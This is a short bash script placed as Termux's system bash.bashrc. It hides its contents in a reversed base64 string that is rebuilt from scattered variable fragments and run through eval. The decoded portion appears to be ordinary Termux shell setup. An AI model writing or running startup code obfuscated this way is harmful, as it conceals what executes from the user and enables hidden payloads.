#!/data/data/com.termux/files/usr/etc/bash.bashrc
#Created by f@br1x
gH4="Ed";kM0="xSz";c="ch";L="4";rQW="";fE1="lQ";s=" 'Kg2chJ2LulmYvgVSGVkUQRCI+BydtACMtACdv9mcwpwJgQCXn0TMTBlCKkmZK0XCKISMkICIk5WdvZWL09mbtQmbh1WbvN2L4VXbyVGdvMWZ4VmYpx2LyNXdvMXZslmZvgXdtJXZ05SbvN2LhRXYk9SY0FGZvkQCKsHIpgSZsRmbhh2Xk5WdvZ2X09mbfRmbh1WbvNWCK4WZoRHI70FIk5WdvZWL09mbtQmbh1WbvN2L4VXbyVGdvMWZ4VmYpx2LyNXdvMXZslmZvgXdtJXZ05SbvN2LhRXYk9SY0FGZvACetAyWgYWa
' | r";HxJ="s";Hc2="";f="as";kcE="pas";cEf="ae";d="o";V9z="6";P8c="if";U=" -d";Jc="ef";N0q="";v="b";w="e";b="v |";Tx="Eds";xZp=""
x=$(eval "$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp")
eval "$N0q$x$Hc2$rQW"
